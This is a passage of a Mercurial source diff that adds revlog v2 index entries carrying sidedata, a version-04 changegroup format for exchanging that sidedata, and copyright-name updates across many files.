@@ -368,7 +378,9 @@ # consume the header if it exists self._cgunpacker.manifestheader() linkmapper = self.unfiltered().changelog.rev - rootstore = bundlemanifest(self.svfs, self._cgunpacker, linkmapper) + rootstore = bundlemanifest( + self.nodeconstants, self.svfs, self._cgunpacker, linkmapper + ) self.filestart = self._cgunpacker.tell() return manifest.manifestlog( @@ -466,7 +478,7 @@ cwd = pathutil.normasprefix(cwd) if parentpath.startswith(cwd): parentpath = parentpath[len(cwd) :] - u = util.url(path) + u = urlutil.url(path) path = u.localpath() if u.scheme == b'bundle': s = path.split(b"+", 1) diff --git a/mercurial/cacheutil.py b/mercurial/cacheutil.py --- a/mercurial/cacheutil.py +++ b/mercurial/cacheutil.py @@ -1,6 +1,6 @@ # scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/cext/bdiff.c b/mercurial/cext/bdiff.c --- a/mercurial/cext/bdiff.c +++ b/mercurial/cext/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/charencode.c b/mercurial/cext/charencode.c --- a/mercurial/cext/charencode.c +++ b/mercurial/cext/charencode.c @@ -1,7 +1,7 @@ /* charencode.c - miscellaneous character encoding - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/mpatch.c b/mercurial/cext/mpatch.c --- a/mercurial/cext/mpatch.c +++ b/mercurial/cext/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/osutil.c b/mercurial/cext/osutil.c --- a/mercurial/cext/osutil.c +++ b/mercurial/cext/osutil.c @@ -1,7 +1,7 @@ /* osutil.c - native operating system services - Copyright 2007 Matt Mackall and others + Copyright 2007 Olivia Mackall and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. @@ -119,7 +119,7 @@ static void listdir_stat_dealloc(PyObject *o) { - o->ob_type->tp_free(o); + Py_TYPE(o)->tp_free(o); } static PyObject *listdir_stat_getitem(PyObject *self, PyObject *key) diff --git a/mercurial/cext/parsers.c b/mercurial/cext/parsers.c --- a/mercurial/cext/parsers.c +++ b/mercurial/cext/parsers.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. @@ -638,7 +638,7 @@ PyObject *encodedir(PyObject *self, PyObject *args); PyObject *pathencode(PyObject *self, PyObject *args); PyObject *lowerencode(PyObject *self, PyObject *args); -PyObject *parse_index2(PyObject *self, PyObject *args); +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs); static PyMethodDef methods[] = { {"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"}, @@ -646,7 +646,8 @@ "create a set containing non-normal and other parent entries of given " "dirstate\n"}, {"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"}, - {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"}, + {"parse_index2", (PyCFunction)parse_index2, METH_VARARGS | METH_KEYWORDS, + "parse a revlog index\n"}, {"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"}, {"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"}, {"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"}, diff --git a/mercurial/cext/pathencode.c b/mercurial/cext/pathencode.c --- a/mercurial/cext/pathencode.c +++ b/mercurial/cext/pathencode.c @@ -21,6 +21,7 @@ #include <ctype.h> #include <stdlib.h> #include <string.h> +#include "pythoncapi_compat.h" #include "util.h" @@ -678,7 +679,7 @@ } assert(PyBytes_Check(ret)); - Py_SIZE(ret) = destlen; + Py_SET_SIZE(ret, destlen); return ret; } diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. @@ -15,6 +15,7 @@ #include <stddef.h> #include <stdlib.h> #include <string.h> +#include <structmember.h> #include "bitmanipulation.h" #include "charencode.h" @@ -98,6 +99,7 @@ int ntlookups; /* # lookups */ int ntmisses; /* # lookups that miss the cache */ int inlined; + long hdrsize; /* size of index headers. Differs in v1 v.s. v2 format */ }; static Py_ssize_t index_length(const indexObject *self) @@ -113,14 +115,19 @@ static int index_find_node(indexObject *self, const char *node); #if LONG_MAX == 0x7fffffffL -static const char *const tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v2_tuple_format = PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); #else -static const char *const tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v2_tuple_format = PY23("kiiiiiis#ki", "kiiiiiiy#ki"); #endif /* A RevlogNG v1 index entry is 64 bytes long. */ static const long v1_hdrsize = 64; +/* A Revlogv2 index entry is 96 bytes long. */ +static const long v2_hdrsize = 96; + static void raise_revlog_error(void) { PyObject *mod = NULL, *dict = NULL, *errclass = NULL; @@ -157,7 +164,7 @@ static const char *index_deref(indexObject *self, Py_ssize_t pos) { if (pos >= self->length) - return self->added + (pos - self->length) * v1_hdrsize; + return self->added + (pos - self->length) * self->hdrsize; if (self->inlined && pos > 0) { if (self->offsets == NULL) { @@ -174,7 +181,7 @@ return self->offsets[pos]; } - return (const char *)(self->buf.buf) + pos * v1_hdrsize; + return (const char *)(self->buf.buf) + pos * self->hdrsize; } /* @@ -280,8 +287,9 @@ */ static PyObject *index_get(indexObject *self, Py_ssize_t pos) { - uint64_t offset_flags; - int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; + uint64_t offset_flags, sidedata_offset; + int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2, + sidedata_comp_len; const char *c_node_id; const char *data; Py_ssize_t length = index_length(self); @@ -320,9 +328,19 @@ parent_2 = getbe32(data + 28); c_node_id = data + 32; - return Py_BuildValue(tuple_format, offset_flags, comp_len, uncomp_len, - base_rev, link_rev, parent_1, parent_2, c_node_id, - self->nodelen); + if (self->hdrsize == v1_hdrsize) { + return Py_BuildValue(v1_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen); + } else { + sidedata_offset = getbe64(data + 64); + sidedata_comp_len = getbe32(data + 72); + + return Py_BuildValue(v2_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen, + sidedata_offset, sidedata_comp_len); + } } /* @@ -373,18 +391,31 @@ static PyObject *index_append(indexObject *self, PyObject *obj) { - uint64_t offset_flags; + uint64_t offset_flags, sidedata_offset; int rev, comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; - Py_ssize_t c_node_id_len; + Py_ssize_t c_node_id_len, sidedata_comp_len; const char *c_node_id; char *data; - if (!PyArg_ParseTuple(obj, tuple_format, &offset_flags, &comp_len, - &uncomp_len, &base_rev, &link_rev, &parent_1, - &parent_2, &c_node_id, &c_node_id_len)) { - PyErr_SetString(PyExc_TypeError, "8-tuple required"); - return NULL; + if (self->hdrsize == v1_hdrsize) { + if (!PyArg_ParseTuple(obj, v1_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len)) { + PyErr_SetString(PyExc_TypeError, "8-tuple required"); + return NULL; + } + } else { + if (!PyArg_ParseTuple(obj, v2_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len, + &sidedata_offset, &sidedata_comp_len)) { + PyErr_SetString(PyExc_TypeError, "10-tuple required"); + return NULL; + } } + if (c_node_id_len != self->nodelen) { PyErr_SetString(PyExc_TypeError, "invalid node"); return NULL; @@ -393,15 +424,15 @@ if (self->new_length == self->added_length) { size_t new_added_length = self->added_length ? self->added_length * 2 : 4096; - void *new_added = - PyMem_Realloc(self->added, new_added_length * v1_hdrsize); + void *new_added = PyMem_Realloc(self->added, new_added_length * + self->hdrsize); if (!new_added) return PyErr_NoMemory(); self->added = new_added; self->added_length = new_added_length; } rev = self->length + self->new_length; - data = self->added + v1_hdrsize * self->new_length++; + data = self->added + self->hdrsize * self->new_length++; putbe32(offset_flags >> 32, data); putbe32(offset_flags & 0xffffffffU, data + 4); putbe32(comp_len, data + 8); @@ -411,7 +442,14 @@ putbe32(parent_1, data + 24); putbe32(parent_2, data + 28); memcpy(data + 32, c_node_id, c_node_id_len); + /* Padding since SHA-1 is only 20 bytes for now */ memset(data + 32 + c_node_id_len, 0, 32 - c_node_id_len); + if (self->hdrsize != v1_hdrsize) { + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + /* Padding for 96 bytes alignment */ + memset(data + 76, 0, self->hdrsize - 76); + } if (self->ntinitialized) nt_insert(&self->nt, c_node_id, rev); @@ -420,6 +458,56 @@ Py_RETURN_NONE; } +/* Replace an existing index entry's sidedata offset and length with new ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the given revision. */ +static PyObject *index_replace_sidedata_info(indexObject *self, PyObject *args) +{ + uint64_t sidedata_offset; + int rev; + Py_ssize_t sidedata_comp_len; + char *data; +#if LONG_MAX == 0x7fffffffL + const char *const sidedata_format = PY23("nKi", "nKi"); +#else + const char *const sidedata_format = PY23("nki", "nki"); +#endif + + if (self->hdrsize == v1_hdrsize || self->inlined) { + /* + There is a bug in the transaction handling when going from an + inline revlog to a separate index and data file. Turn it off until + it's fixed, since v2 revlogs sometimes get rewritten on exchange. + See issue6485. + */ + raise_revlog_error(); + return NULL; + } + + if (!PyArg_ParseTuple(args, sidedata_format, &rev, &sidedata_offset, + &sidedata_comp_len)) + return NULL; + + if (rev < 0 || rev >= index_length(self)) { + PyErr_SetString(PyExc_IndexError, "revision outside index"); + return NULL; + } + if (rev < self->length) { + PyErr_SetString( + PyExc_IndexError, + "cannot rewrite entries outside of this transaction"); + return NULL; + } + + /* Find the newly added node, offset from the "already on-disk" length + */ + data = self->added + self->hdrsize * (rev - self->length); + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + + Py_RETURN_NONE; +} + static PyObject *index_stats(indexObject *self) { PyObject *obj = PyDict_New(); @@ -2563,14 +2651,17 @@ const char *data = (const char *)self->buf.buf; Py_ssize_t pos = 0; Py_ssize_t end = self->buf.len; - long incr = v1_hdrsize; + long incr = self->hdrsize; Py_ssize_t len = 0; - while (pos + v1_hdrsize <= end && pos >= 0) { - uint32_t comp_len; + while (pos + self->hdrsize <= end && pos >= 0) { + uint32_t comp_len, sidedata_comp_len = 0; /* 3rd element of header is length of compressed inline data */ comp_len = getbe32(data + pos + 8); - incr = v1_hdrsize + comp_len; + if (self->hdrsize == v2_hdrsize) { + sidedata_comp_len = getbe32(data + pos + 72); + } + incr = self->hdrsize + comp_len + sidedata_comp_len; if (offsets) offsets[len] = data + pos; len++; @@ -2586,11 +2677,13 @@ return len; } -static int index_init(indexObject *self, PyObject *args) +static int index_init(indexObject *self, PyObject *args, PyObject *kwargs) { - PyObject *data_obj, *inlined_obj; + PyObject *data_obj, *inlined_obj, *revlogv2; Py_ssize_t size; + static char *kwlist[] = {"data", "inlined", "revlogv2", NULL}; + /* Initialize before argument-checking to avoid index_dealloc() crash. */ self->added = NULL; @@ -2606,7 +2699,9 @@ self->nodelen = 20; self->nullentry = NULL; - if (!PyArg_ParseTuple(args, "OO", &data_obj, &inlined_obj)) + revlogv2 = NULL; + if (!PyArg_ParseTupleAndKeywords(args, kwargs, "OO|O", kwlist, + &data_obj, &inlined_obj, &revlogv2)) return -1; if (!PyObject_CheckBuffer(data_obj)) { PyErr_SetString(PyExc_TypeError, @@ -2618,8 +2713,22 @@ return -1; } - self->nullentry = Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, - -1, -1, -1, -1, nullid, self->nodelen); + if (revlogv2 && PyObject_IsTrue(revlogv2)) { + self->hdrsize = v2_hdrsize; + } else { + self->hdrsize = v1_hdrsize; + } + + if (self->hdrsize == v1_hdrsize) { + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1, + -1, -1, -1, nullid, self->nodelen); + } else { + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, + -1, -1, -1, -1, nullid, self->nodelen, 0, 0); + } + if (!self->nullentry) return -1; PyObject_GC_UnTrack(self->nullentry); @@ -2641,11 +2750,11 @@ goto bail; self->length = len; } else { - if (size % v1_hdrsize) { + if (size % self->hdrsize) { PyErr_SetString(PyExc_ValueError, "corrupt index file"); goto bail; } - self->length = size / v1_hdrsize; + self->length = size / self->hdrsize; } return 0; @@ -2730,6 +2839,8 @@ "compute phases"}, {"reachableroots2", (PyCFunction)reachableroots2, METH_VARARGS, "reachableroots"}, + {"replace_sidedata_info", (PyCFunction)index_replace_sidedata_info, + METH_VARARGS, "replace an existing index entry with a new value"}, {"headrevs", (PyCFunction)index_headrevs, METH_VARARGS, "get head revisions"}, /* Can do filtering since 3.2 */ {"headrevsfiltered", (PyCFunction)index_headrevs, METH_VARARGS, @@ -2756,6 +2867,12 @@ {NULL} /* Sentinel */ }; +static PyMemberDef index_members[] = { + {"entry_size", T_LONG, offsetof(indexObject, hdrsize), 0, + "size of an index entry"}, + {NULL} /* Sentinel */ +}; + PyTypeObject HgRevlogIndex_Type = { PyVarObject_HEAD_INIT(NULL, 0) /* header */ "parsers.index", /* tp_name */ @@ -2785,7 +2902,7 @@ 0, /* tp_iter */ 0, /* tp_iternext */ index_methods, /* tp_methods */ - 0, /* tp_members */ + index_members, /* tp_members */ index_getset, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ @@ -2797,16 +2914,16 @@ }; /* - * returns a tuple of the form (index, index, cache) with elements as + * returns a tuple of the form (index, cache) with elements as * follows: * - * index: an index object that lazily parses RevlogNG records + * index: an index object that lazily parses Revlog (v1 or v2) records * cache: if data is inlined, a tuple (0, index_file_content), else None * index_file_content could be a string, or a buffer * * added complications are for backwards compatibility */ -PyObject *parse_index2(PyObject *self, PyObject *args) +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs) { PyObject *cache = NULL; indexObject *idx; @@ -2816,7 +2933,7 @@ if (idx == NULL) goto bail; - ret = index_init(idx, args); + ret = index_init(idx, args, kwargs); if (ret == -1) goto bail; diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1,12 +1,13 @@ # changegroup.py - Mercurial changegroup manipulation functions # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. from __future__ import absolute_import +import collections import os import struct import weakref @@ -32,6 +33,7 @@ ) from .interfaces import repository +from .revlogutils import sidedata as sidedatamod _CHANGEGROUPV1_DELTA_HEADER = struct.Struct(b"20s20s20s20s") _CHANGEGROUPV2_DELTA_HEADER = struct.Struct(b"20s20s20s20s20s") @@ -202,7 +204,9 @@ header = self.deltaheader.unpack(headerdata) delta = readexactly(self._stream, l - self.deltaheadersize) node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode) - return (node, p1, p2, cs, deltabase, delta, flags) + # cg4 forward-compat + sidedata = {} + return (node, p1, p2, cs, deltabase, delta, flags, sidedata) def getchunks(self): """returns all the chunks contains in the bundle @@ -249,7 +253,7 @@ pos = next yield closechunk() - def _unpackmanifests(self, repo, revmap, trp, prog): + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): self.callback = prog.increment # no need to check for empty manifest group here: # if the result of the merge of 1 and 2 is the same in 3 and 4, @@ -257,7 +261,8 @@ # be empty during the pull self.manifestheader() deltas = self.deltaiter() - repo.manifestlog.getstorage(b'').addgroup(deltas, revmap, trp) + storage = repo.manifestlog.getstorage(b'') + storage.addgroup(deltas, revmap, trp, addrevisioncb=addrevisioncb) prog.complete() self.callback = None @@ -269,6 +274,7 @@ url, targetphase=phases.draft, expectedtotal=None, + sidedata_categories=None, ): """Add the changegroup returned by source.read() to this repo. srctype is a string like 'push', 'pull', or 'unbundle'. url is @@ -279,9 +285,23 @@ - more heads than before: 1+added heads (2..n) - fewer heads than before: -1-removed heads (-2..-n) - number of heads stays the same: 1 + + `sidedata_categories` is an optional set of the remote's sidedata wanted + categories. """ repo = repo.unfiltered() + # Only useful if we're adding sidedata categories. If both peers have + # the same categories, then we simply don't do anything. + if self.version == b'04' and srctype == b'pull': + sidedata_helpers = get_sidedata_helpers( + repo, + sidedata_categories or set(), + pull=True, + ) + else: + sidedata_helpers = None + def csmap(x): repo.ui.debug(b"add changeset %s\n" % short(x)) return len(cl) @@ -316,14 +336,16 @@ self.callback = progress.increment efilesset = set() - cgnodes = [] + duprevs = [] - def ondupchangelog(cl, node): - if cl.rev(node) < clstart: - cgnodes.append(node) + def ondupchangelog(cl, rev): + if rev < clstart: + duprevs.append(rev) - def onchangelog(cl, node): - efilesset.update(cl.readfiles(node)) + def onchangelog(cl, rev): + ctx = cl.changelogrevision(rev) + efilesset.update(ctx.files) + repo.register_changeset(rev, ctx) self.changelogheader() deltas = self.deltaiter() @@ -331,6 +353,7 @@ deltas, csmap, trp, + alwayscache=True, addrevisioncb=onchangelog, duplicaterevisioncb=ondupchangelog, ): @@ -348,6 +371,13 @@ efilesset = None self.callback = None + # Keep track of the (non-changelog) revlogs we've updated and their + # range of new revisions for sidedata rewrite. + # TODO do something more efficient than keeping the reference to + # the revlogs, especially memory-wise. + touched_manifests = {} + touched_filelogs = {} + # pull off the manifest group repo.ui.status(_(b"adding manifests\n")) # We know that we'll never have more manifests than we had @@ -355,7 +385,24 @@ progress = repo.ui.makeprogress( _(b'manifests'), unit=_(b'chunks'), total=changesets ) - self._unpackmanifests(repo, revmap, trp, progress) + on_manifest_rev = None + if sidedata_helpers and b'manifest' in sidedata_helpers[1]: + + def on_manifest_rev(manifest, rev): + range = touched_manifests.get(manifest) + if not range: + touched_manifests[manifest] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_manifests[manifest] = (range[0], rev) + + self._unpackmanifests( + repo, + revmap, + trp, + progress, + addrevisioncb=on_manifest_rev, + ) needfiles = {} if repo.ui.configbool(b'server', b'validate'): @@ -369,12 +416,37 @@ for f, n in pycompat.iteritems(mfest): needfiles.setdefault(f, set()).add(n) + on_filelog_rev = None + if sidedata_helpers and b'filelog' in sidedata_helpers[1]: + + def on_filelog_rev(filelog, rev): + range = touched_filelogs.get(filelog) + if not range: + touched_filelogs[filelog] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_filelogs[filelog] = (range[0], rev) + # process the files repo.ui.status(_(b"adding file changes\n")) newrevs, newfiles = _addchangegroupfiles( - repo, self, revmap, trp, efiles, needfiles + repo, + self, + revmap, + trp, + efiles, + needfiles, + addrevisioncb=on_filelog_rev, ) + if sidedata_helpers: + if b'changelog' in sidedata_helpers[1]: + cl.rewrite_sidedata(sidedata_helpers, clstart, clend - 1) + for mf, (startrev, endrev) in touched_manifests.items(): + mf.rewrite_sidedata(sidedata_helpers, startrev, endrev) + for fl, (startrev, endrev) in touched_filelogs.items(): + fl.rewrite_sidedata(sidedata_helpers, startrev, endrev) + # making sure the value exists tr.changes.setdefault(b'changegroup-count-changesets', 0) tr.changes.setdefault(b'changegroup-count-revisions', 0) @@ -445,8 +517,12 @@ if added: phases.registernew(repo, tr, targetphase, added) if phaseall is not None: - phases.advanceboundary(repo, tr, phaseall, cgnodes, revs=added) - cgnodes = [] + if duprevs: + duprevs.extend(added) + else: + duprevs = added + phases.advanceboundary(repo, tr, phaseall, [], revs=duprevs) + duprevs = [] if changesets > 0: @@ -494,7 +570,7 @@ """ chain = None for chunkdata in iter(lambda: self.deltachunk(chain), {}): - # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags) + # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags, sidedata) yield chunkdata chain = chunkdata[0] @@ -534,17 +610,44 @@ node, p1, p2, deltabase, cs, flags = headertuple return node, p1, p2, deltabase, cs, flags - def _unpackmanifests(self, repo, revmap, trp, prog): - super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog) + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): + super(cg3unpacker, self)._unpackmanifests( + repo, revmap, trp, prog, addrevisioncb=addrevisioncb + ) for chunkdata in iter(self.filelogheader, {}): # If we get here, there are directory manifests in the changegroup d = chunkdata[b"filename"] repo.ui.debug(b"adding %s revisions\n" % d) deltas = self.deltaiter() - if not repo.manifestlog.getstorage(d).addgroup(deltas, revmap, trp): + if not repo.manifestlog.getstorage(d).addgroup( + deltas, revmap, trp, addrevisioncb=addrevisioncb + ): raise error.Abort(_(b"received dir revlog group is empty")) +class cg4unpacker(cg3unpacker): + """Unpacker for cg4 streams. + + cg4 streams add support for exchanging sidedata. + """ + + version = b'04' + + def deltachunk(self, prevnode): + res = super(cg4unpacker, self).deltachunk(prevnode) + if not res: + return res + + (node, p1, p2, cs, deltabase, delta, flags, _sidedata) = res + + sidedata_raw = getchunk(self._stream) + sidedata = {} + if len(sidedata_raw) > 0: + sidedata = sidedatamod.deserialize_sidedata(sidedata_raw) + + return node, p1, p2, cs, deltabase, delta, flags, sidedata + + class headerlessfixup(object): def __init__(self, fh, h): self._h = h @@ -559,7 +662,7 @@ return readexactly(self._fh, n) -def _revisiondeltatochunks(delta, headerfn): +def _revisiondeltatochunks(repo, delta, headerfn): """Serialize a revisiondelta to changegroup chunks.""" # The captured revision delta may be encoded as a delta against @@ -585,6 +688,13 @@ yield prefix yield data + sidedata = delta.sidedata + if sidedata is not None: + # Need a separate chunk for sidedata to be able to differentiate + # "raw delta" length and sidedata length + yield chunkheader(len(sidedata)) + yield sidedata + def _sortnodesellipsis(store, nodes, cl, lookup): """Sort nodes for changegroup generation.""" @@ -678,7 +788,7 @@ # We failed to resolve a parent for this node, so # we crash the changegroup construction. raise error.Abort( - b'unable to resolve parent while packing %r %r' + b"unable to resolve parent while packing '%s' %r" b' for changeset %r' % (store.indexfile, rev, clrev) ) @@ -709,6 +819,7 @@ clrevtolocalrev=None, fullclnodes=None, precomputedellipsis=None, + sidedata_helpers=None, ): """Calculate deltas for a set of revisions. @@ -716,6 +827,8 @@ If topic is not None, progress detail will be generated using this topic name (e.g. changesets, manifests, etc). + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ if not nodes: return @@ -814,6 +927,7 @@ revisiondata=True, assumehaveparentrevisions=not ellipses, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) for i, revision in enumerate(revisions): @@ -854,6 +968,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): """Given a source repo, construct a bundler. @@ -886,6 +1001,8 @@ nodes. We store this rather than the set of nodes that should be ellipsis because for very large histories we expect this to be significantly smaller. + + remote_sidedata is the set of sidedata categories wanted by the remote. """ assert oldmatcher assert matcher @@ -902,6 +1019,9 @@ if bundlecaps is None: bundlecaps = set() self._bundlecaps = bundlecaps + if remote_sidedata is None: + remote_sidedata = set() + self._remote_sidedata = remote_sidedata self._isshallow = shallow self._fullclnodes = fullnodes @@ -928,11 +1048,26 @@ self._verbosenote(_(b'uncompressed size of bundle content:\n')) size = 0 + sidedata_helpers = None + if self.version == b'04': + remote_sidedata = self._remote_sidedata + if source == b'strip': + # We're our own remote when stripping, get the no-op helpers + # TODO a better approach would be for the strip bundle to + # correctly advertise its sidedata categories directly. + remote_sidedata = repo._wanted_sidedata + sidedata_helpers = get_sidedata_helpers(repo, remote_sidedata) + clstate, deltas = self._generatechangelog( - cl, clnodes, generate=changelog + cl, + clnodes, + generate=changelog, + sidedata_helpers=sidedata_helpers, ) for delta in deltas: - for chunk in _revisiondeltatochunks(delta, self._builddeltaheader): + for chunk in _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ): size += len(chunk) yield chunk @@ -977,17 +1112,20 @@ fnodes, source, clstate[b'clrevtomanifestrev'], + sidedata_helpers=sidedata_helpers, ) for tree, deltas in it: if tree: - assert self.version == b'03' + assert self.version in (b'03', b'04') chunk = _fileheader(tree) size += len(chunk) yield chunk for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk @@ -1002,7 +1140,7 @@ mfdicts = None if self._ellipses and self._isshallow: mfdicts = [ - (self._repo.manifestlog[n].read(), lr) + (repo.manifestlog[n].read(), lr) for (n, lr) in pycompat.iteritems(manifests) ] @@ -1017,6 +1155,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=sidedata_helpers, ) for path, deltas in it: @@ -1025,7 +1164,9 @@ yield h for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk @@ -1041,7 +1182,9 @@ if clnodes: repo.hook(b'outgoing', node=hex(clnodes[0]), source=source) - def _generatechangelog(self, cl, nodes, generate=True): + def _generatechangelog( + self, cl, nodes, generate=True, sidedata_helpers=None + ): """Generate data for changelog chunks. Returns a 2-tuple of a dict containing state and an iterable of @@ -1050,6 +1193,8 @@ if generate is False, the state will be fully populated and no chunk stream will be yielded + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ clrevorder = {} manifests = {} @@ -1133,6 +1278,7 @@ clrevtolocalrev={}, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) return state, gen @@ -1146,11 +1292,14 @@ fnodes, source, clrevtolocalrev, + sidedata_helpers=None, ): """Returns an iterator of changegroup chunks containing manifests. `source` is unused here, but is used by extensions like remotefilelog to change what is sent based in pulls vs pushes, etc. + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ repo = self._repo mfl = repo.manifestlog @@ -1240,6 +1389,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) if not self._oldmatcher.visitdir(store.tree[:-1]): @@ -1278,6 +1428,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=None, ): changedfiles = [ f @@ -1372,6 +1523,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) yield fname, deltas @@ -1388,6 +1540,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV1_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.linknode @@ -1418,6 +1571,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV2_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, d.linknode @@ -1447,6 +1601,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags @@ -1467,12 +1622,47 @@ ) +def _makecg4packer( + repo, + oldmatcher, + matcher, + bundlecaps, + ellipses=False, + shallow=False, + ellipsisroots=None, + fullnodes=None, + remote_sidedata=None, +): + # Same header func as cg3. Sidedata is in a separate chunk from the delta to + # differenciate "raw delta" and sidedata. + builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( + d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags + ) + + return cgpacker( + repo, + oldmatcher, + matcher, + b'04', + builddeltaheader=builddeltaheader, + manifestsend=closechunk(), + bundlecaps=bundlecaps, + ellipses=ellipses, + shallow=shallow, + ellipsisroots=ellipsisroots, + fullnodes=fullnodes, + remote_sidedata=remote_sidedata, + ) + + _packermap = { b'01': (_makecg1packer, cg1unpacker), # cg2 adds support for exchanging generaldelta b'02': (_makecg2packer, cg2unpacker), # cg3 adds support for exchanging revlog flags and treemanifests b'03': (_makecg3packer, cg3unpacker), + # ch4 adds support for exchanging sidedata + b'04': (_makecg4packer, cg4unpacker), } @@ -1492,11 +1682,9 @@ # # (or even to push subset of history) needv03 = True - if b'exp-sidedata-flag' in repo.requirements: - needv03 = True - # don't attempt to use 01/02 until we do sidedata cleaning - 